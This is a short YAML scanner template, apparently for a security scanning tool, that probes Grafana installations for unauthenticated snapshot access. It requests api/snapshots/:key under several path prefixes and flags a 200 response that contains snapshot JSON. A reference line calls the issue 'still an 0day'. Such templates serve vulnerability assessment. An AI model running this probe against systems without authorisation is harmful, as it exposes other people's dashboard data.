id: grafana-unauth-snapshot-access
info:
  name: Grafana Unauth Snapshot Access
  risk: Medium

params:
  - root: "{{.BaseURL}}"

replicate:
  ports: '3000'

variables:
  - endpoint: |
      /
      /grafana/
      /debug/grafana/
      /-/grafana/
      /gitlab/-/grafana/
      /-/debug/grafana/

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.endpoint}}api/snapshots/:key
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/json
      - Referer: "{{.BaseURL}}/login"
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", '"isSnapshot":true') && StringSearch("resHeaders", "application/json") && StringSearch("body", 'originalUrl')

references:
  - author: 'theblackturtle' 
  - note: 'This is still an 0day'
